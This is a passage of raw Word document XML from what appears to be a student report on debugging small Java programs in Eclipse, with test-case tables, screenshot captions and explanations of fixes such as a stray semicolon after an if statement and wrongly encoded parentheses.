          <w:p w:rsidR="47DFBE43" w:rsidP="7CC6EB9B" w:rsidRDefault="47DFBE43" w14:paraId="52636A83" w14:textId="1A88283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7DFBE43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47DFBE43" w:rsidP="7CC6EB9B" w:rsidRDefault="47DFBE43" w14:paraId="30C77CE6" w14:textId="5C4C01C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7DFBE43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47DFBE43" w:rsidP="7CC6EB9B" w:rsidRDefault="47DFBE43" w14:paraId="507E4F70" w14:textId="0A57066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7DFBE43">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="7CC6EB9B" w:rsidTr="7CC6EB9B" w14:paraId="77020353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63D1BA24" w14:textId="2A4B547D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1FAD61C5" w:rsidP="7CC6EB9B" w:rsidRDefault="1FAD61C5" w14:paraId="12109AD7" w14:textId="4CFE364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FAD61C5">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Z=10</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="1FAD61C5" w:rsidP="7CC6EB9B" w:rsidRDefault="1FAD61C5" w14:paraId="1614D12F" w14:textId="002365F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FAD61C5">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Z=10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="1FAD61C5" w:rsidP="7CC6EB9B" w:rsidRDefault="1FAD61C5" w14:paraId="3F0B84EB" w14:textId="2B2B7D1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FAD61C5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1FAD61C5" w:rsidP="7CC6EB9B" w:rsidRDefault="1FAD61C5" w14:paraId="2EC6D236" w14:textId="231521D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FAD61C5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1FAD61C5" w:rsidP="7CC6EB9B" w:rsidRDefault="1FAD61C5" w14:paraId="388EDD32" w14:textId="73424B7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1FAD61C5">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="7CC6EB9B" w:rsidP="7CC6EB9B" w:rsidRDefault="7CC6EB9B" w14:paraId="0F72DA84" w14:textId="5402C5F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8D97A7B" w:rsidP="7CC6EB9B" w:rsidRDefault="78D97A7B" w14:paraId="2F97DE88" w14:textId="019C98D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8D97A7B">
        <w:drawing>
          <wp:inline wp14:editId="5FDB433D" wp14:anchorId="52E1CADF">
            <wp:extent cx="5531132" cy="4457929"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="80580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7654a9294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2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71E3B" w:rsidP="7CC6EB9B" w:rsidRDefault="6E971E3B" w14:paraId="2DC3698B" w14:textId="31179ED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E971E3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figure 8: Code C Test Case 1 Screenshot</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2D83D2EB" w:rsidP="7CC6EB9B" w:rsidRDefault="2D83D2EB" w14:paraId="623BB4AA" w14:textId="55D6C4F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D83D2EB">
        <w:drawing>
          <wp:inline wp14:editId="44E58E69" wp14:anchorId="284127C4">
            <wp:extent cx="4101625" cy="3438487"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="28651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a38512920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25" cy="34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83D2EB" w:rsidP="7CC6EB9B" w:rsidRDefault="2D83D2EB" w14:paraId="0C3351EE" w14:textId="712DB84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D83D2EB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figure 9: Code C Test Case 2 Screenshot</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="02FFE730" w:rsidP="7CC6EB9B" w:rsidRDefault="02FFE730" w14:paraId="7E03D308" w14:textId="2BA1828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2FFE730">
        <w:drawing>
          <wp:inline wp14:editId="243DAC6A" wp14:anchorId="20EA72F7">
            <wp:extent cx="3884369" cy="3673708"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1618845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78d3cc45b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69" cy="36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E730" w:rsidP="7CC6EB9B" w:rsidRDefault="02FFE730" w14:paraId="7BC690A6" w14:textId="5AE313E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02FFE730">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figure 10: Code C Test Case 3 Screenshot</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="02FFE730" w:rsidP="7CC6EB9B" w:rsidRDefault="02FFE730" w14:paraId="42E55DD4" w14:textId="7B33989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02FFE730">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">There is a single reason behind two out of three test cases failing here, and, ironically, it is the same reason the </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="02FFE730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7CC6EB9B" w:rsidR="02FFE730">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> code failed</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="0932CB58">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. The if loop has a semicolon after it, which causes the rest of the code to be interpreted as a separ</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="69FF4E4E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ate statement (</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="69FF4E4E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>i.e.</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="69FF4E4E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> The “print” statement will print regardless of the value of variables contained in the if loop). To fix this, we simply</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="44496B96">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> remove the semicolon, and test again.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5EC67BB5">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="44496B96" w:rsidP="7CC6EB9B" w:rsidRDefault="44496B96" w14:paraId="6313EC43" w14:textId="73507DF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872" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="44496B96" w:rsidP="7CC6EB9B" w:rsidRDefault="44496B96" w14:paraId="2590B0A5" w14:textId="69734EE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44496B96" w:rsidP="7CC6EB9B" w:rsidRDefault="44496B96" w14:paraId="3A17C696" w14:textId="5F44FA8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Result:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="44496B96" w:rsidP="7CC6EB9B" w:rsidRDefault="44496B96" w14:paraId="754C8984" w14:textId="0866252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Result:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="44496B96" w:rsidP="7CC6EB9B" w:rsidRDefault="44496B96" w14:paraId="0492B598" w14:textId="228254D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3AA1567A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71BF1000" w14:textId="0B6ED3A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4496B96" w:rsidP="7CC6EB9B" w:rsidRDefault="44496B96" w14:paraId="263946B2" w14:textId="713A65F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z = 10;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="44496B96" w:rsidP="7CC6EB9B" w:rsidRDefault="44496B96" w14:paraId="202A13AA" w14:textId="0C25E3C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d = 7;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="44496B96" w:rsidP="7CC6EB9B" w:rsidRDefault="44496B96" w14:paraId="73E3EB45" w14:textId="0122570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44496B96" w:rsidP="7CC6EB9B" w:rsidRDefault="44496B96" w14:paraId="7F03C559" w14:textId="3E07769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Z is bigger</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="44496B96" w:rsidP="7CC6EB9B" w:rsidRDefault="44496B96" w14:paraId="046F7812" w14:textId="278B635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7CC6EB9B" w:rsidTr="7CC6EB9B" w14:paraId="73BE472F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69DA5425" w14:textId="3800606A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4496B96" w:rsidP="7CC6EB9B" w:rsidRDefault="44496B96" w14:paraId="6D0F9A75" w14:textId="02A5196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z = 7;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="44496B96" w:rsidP="7CC6EB9B" w:rsidRDefault="44496B96" w14:paraId="183CC9EB" w14:textId="23FA2E4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d = 10;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="44496B96" w:rsidP="7CC6EB9B" w:rsidRDefault="44496B96" w14:paraId="7421B50B" w14:textId="1BE15A8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07A87D0B" w:rsidP="7CC6EB9B" w:rsidRDefault="07A87D0B" w14:paraId="34B4C3B1" w14:textId="27CE27C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7A87D0B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07A87D0B" w:rsidP="7CC6EB9B" w:rsidRDefault="07A87D0B" w14:paraId="172548B0" w14:textId="2DF5EDC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07A87D0B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7CC6EB9B" w:rsidTr="7CC6EB9B" w14:paraId="310D2DF0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2E32D01B" w14:textId="13CCB39C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4496B96" w:rsidP="7CC6EB9B" w:rsidRDefault="44496B96" w14:paraId="77A89388" w14:textId="63DFC66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z = 10;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="44496B96" w:rsidP="7CC6EB9B" w:rsidRDefault="44496B96" w14:paraId="62B267B7" w14:textId="04A0C79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Int d = 10;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="44496B96" w:rsidP="7CC6EB9B" w:rsidRDefault="44496B96" w14:paraId="750FA973" w14:textId="40BED05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4496B96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22AA1856" w:rsidP="7CC6EB9B" w:rsidRDefault="22AA1856" w14:paraId="7F87EAD0" w14:textId="21A395D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2AA1856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22AA1856" w:rsidP="7CC6EB9B" w:rsidRDefault="22AA1856" w14:paraId="66F5B2D9" w14:textId="6BE1080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2AA1856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</w:tbl>
    <w:p w:rsidR="7CC6EB9B" w:rsidP="7CC6EB9B" w:rsidRDefault="7CC6EB9B" w14:paraId="2223EDDC" w14:textId="5966D7B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496B96" w:rsidP="7CC6EB9B" w:rsidRDefault="44496B96" w14:paraId="3DDDDD53" w14:textId="5D4703B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4496B96">
        <w:drawing>
          <wp:inline wp14:editId="2DAAA44D" wp14:anchorId="04C3524B">
            <wp:extent cx="4407126" cy="4521432"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="211261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9b8148239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96B96" w:rsidP="7CC6EB9B" w:rsidRDefault="44496B96" w14:paraId="6BC155CA" w14:textId="1C058B6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4496B96">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figure 11: Code C Test Case 4 Screenshot</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6D21552B" w:rsidP="7CC6EB9B" w:rsidRDefault="6D21552B" w14:paraId="1E87FD1A" w14:textId="71C3A70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6D21552B">
        <w:drawing>
          <wp:inline wp14:editId="340613D5" wp14:anchorId="5AC64D2F">
            <wp:extent cx="3473873" cy="4826298"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1857169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6f2d7a527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73" cy="48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552B" w:rsidP="7CC6EB9B" w:rsidRDefault="6D21552B" w14:paraId="3600D1B7" w14:textId="43E9C26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21552B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figure 12: Code C Test Case 5 Screenshot</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="44E3A897" w:rsidP="7CC6EB9B" w:rsidRDefault="44E3A897" w14:paraId="51C03524" w14:textId="1163746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4E3A897">
        <w:drawing>
          <wp:inline wp14:editId="42F84A83" wp14:anchorId="3082B8D6">
            <wp:extent cx="3490912" cy="4654550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="58287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088de7162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912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3A897" w:rsidP="7CC6EB9B" w:rsidRDefault="44E3A897" w14:paraId="192B4DAB" w14:textId="24E9A61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4E3A897">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figure 13: Code C Test Case 6 Screenshot</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="44E3A897" w:rsidP="7CC6EB9B" w:rsidRDefault="44E3A897" w14:paraId="76D75D73" w14:textId="0B45A98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4E3A897">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>As</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="44E3A897">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> seen above, </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="40ACD6B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>all test cases passed on the second attempt, the latter two producing no output, since a printed phrase was onl</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="35E50936">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>y expected to appear if z is bigger than d.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="35E50936" w:rsidP="7CC6EB9B" w:rsidRDefault="35E50936" w14:paraId="63EC7CA2" w14:textId="0D993C4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5E50936"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 w:rsidRPr="7CC6EB9B" w:rsidR="36B5D798">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The only thing wrong with this code are the parentheses within the print statement. </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="7482FA94">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">They </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="7482FA94">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>seem to be</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="7482FA94">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a different font than the usual Java code, which causes Eclipse to misinterpret them as a different symbol. The change of parentheses can be seen below:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7482FA94" w:rsidP="7CC6EB9B" w:rsidRDefault="7482FA94" w14:paraId="05F652C4" w14:textId="7F0DF82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482FA94">
        <w:drawing>
          <wp:inline wp14:editId="7452EC59" wp14:anchorId="2DEA02A1">
            <wp:extent cx="3257768" cy="1568014"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="125652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5cb437412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68" cy="15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2FA94" w:rsidP="7CC6EB9B" w:rsidRDefault="7482FA94" w14:paraId="554875BB" w14:textId="31A9179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7482FA94">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figure 14: Code D with original parentheses</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4192D064" w:rsidP="7CC6EB9B" w:rsidRDefault="4192D064" w14:paraId="667D4C61" w14:textId="3361875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192D064">
        <w:drawing>
          <wp:inline wp14:editId="41409CE8" wp14:anchorId="23056140">
            <wp:extent cx="3829279" cy="1920094"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="146982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72124bff0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79" cy="19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2D064" w:rsidP="7CC6EB9B" w:rsidRDefault="4192D064" w14:paraId="79191DE5" w14:textId="4B4706E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192D064">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figure 15: Code D with corrected parentheses</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4192D064" w:rsidP="7CC6EB9B" w:rsidRDefault="4192D064" w14:paraId="2F8F2645" w14:textId="287B302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192D064">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Now, to test the code, we will first run it as it is, </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="3CF53425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7CC6EB9B" w:rsidR="4192D064">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> then replace the value of m2 with </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="636BC52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CC6EB9B" w:rsidR="4192D064">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="6ED78F93">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>e</w:t>
      </w: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>” to make them equal.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4E52C0FF">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="24351CAA" w:rsidP="7CC6EB9B" w:rsidRDefault="24351CAA" w14:paraId="13D07C15" w14:textId="6AB5F61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872" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="24351CAA" w:rsidP="7CC6EB9B" w:rsidRDefault="24351CAA" w14:paraId="76B2C775" w14:textId="0963801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24351CAA" w:rsidP="7CC6EB9B" w:rsidRDefault="24351CAA" w14:paraId="5FA07400" w14:textId="067BA00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Result:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="24351CAA" w:rsidP="7CC6EB9B" w:rsidRDefault="24351CAA" w14:paraId="35102E92" w14:textId="128CC1E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Result:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="24351CAA" w:rsidP="7CC6EB9B" w:rsidRDefault="24351CAA" w14:paraId="39AC0BA6" w14:textId="48F6AA1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2274D423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7AA9D0EC" w14:textId="30117A2E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24351CAA" w:rsidP="7CC6EB9B" w:rsidRDefault="24351CAA" w14:paraId="4EBF82DD" w14:textId="2235E61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M1= “one”</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="24351CAA" w:rsidP="7CC6EB9B" w:rsidRDefault="24351CAA" w14:paraId="1AACE2B4" w14:textId="54D53DF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M2= “two”</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="24351CAA" w:rsidP="7CC6EB9B" w:rsidRDefault="24351CAA" w14:paraId="7A6F6334" w14:textId="5057347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24351CAA" w:rsidP="7CC6EB9B" w:rsidRDefault="24351CAA" w14:paraId="321E5AA6" w14:textId="1A0869F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No output</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="24351CAA" w:rsidP="7CC6EB9B" w:rsidRDefault="24351CAA" w14:paraId="052F159B" w14:textId="60F2478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7CC6EB9B" w:rsidTr="7CC6EB9B" w14:paraId="3BFDFAB0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50719CCE" w14:textId="6B2D98F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24351CAA" w:rsidP="7CC6EB9B" w:rsidRDefault="24351CAA" w14:paraId="46B919FB" w14:textId="7862BE5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M1= “one”</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="24351CAA" w:rsidP="7CC6EB9B" w:rsidRDefault="24351CAA" w14:paraId="2BD26BFD" w14:textId="2D1E875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M2= “one”</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="24351CAA" w:rsidP="7CC6EB9B" w:rsidRDefault="24351CAA" w14:paraId="1C0C5DD0" w14:textId="5DCC7C7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M1 is equal to M2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="24351CAA" w:rsidP="7CC6EB9B" w:rsidRDefault="24351CAA" w14:paraId="56B54FC3" w14:textId="47EE539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M1 is equal to M2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="24351CAA" w:rsidP="7CC6EB9B" w:rsidRDefault="24351CAA" w14:paraId="1C811AAD" w14:textId="53BE1B1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24351CAA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</w:tbl>
    <w:p w:rsidR="7CC6EB9B" w:rsidP="7CC6EB9B" w:rsidRDefault="7CC6EB9B" w14:paraId="4CE40633" w14:textId="7D7205E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351CAA" w:rsidP="7CC6EB9B" w:rsidRDefault="24351CAA" w14:paraId="576A3B80" w14:textId="6A1C105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4351CAA">
        <w:drawing>
          <wp:inline wp14:editId="0CB8C6DD" wp14:anchorId="2F61984B">
            <wp:extent cx="3177527" cy="3198936"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2103865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e6ce8f592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27" cy="31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51CAA" w:rsidP="7CC6EB9B" w:rsidRDefault="24351CAA" w14:paraId="3E051341" w14:textId="61AEA80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 xml:space="preserve">Figure 16: Code D Test Case 1 </w:t>
      </w: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>Screensot</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="24351CAA" w:rsidP="7CC6EB9B" w:rsidRDefault="24351CAA" w14:paraId="0473C042" w14:textId="7B56F0F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4351CAA">
        <w:drawing>
          <wp:inline wp14:editId="2DC5F880" wp14:anchorId="2E8EBD55">
            <wp:extent cx="3514990" cy="3111416"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="183519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9526582fb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90" cy="31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51CAA" w:rsidP="7CC6EB9B" w:rsidRDefault="24351CAA" w14:paraId="31D75517" w14:textId="0B5AF4D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>Figure 17: Code D Test Case 2 Screenshot</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="24351CAA" w:rsidP="7CC6EB9B" w:rsidRDefault="24351CAA" w14:paraId="4A9066D0" w14:textId="4060312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 xml:space="preserve">Both test cases have passed successfully, </w:t>
      </w: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>indicating</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="24351CAA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> the code now works as expected.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="616AB43C" w:rsidP="7CC6EB9B" w:rsidRDefault="616AB43C" w14:paraId="15434810" w14:textId="254F13F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16AB43C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">E. </w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="50B68242">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>At first glance, t</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="616AB43C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>his</w:t>
      </w:r>
      <w:r w:rsidRPr="7CC6EB9B" w:rsidR="616AB43C">
        <w:rPr>
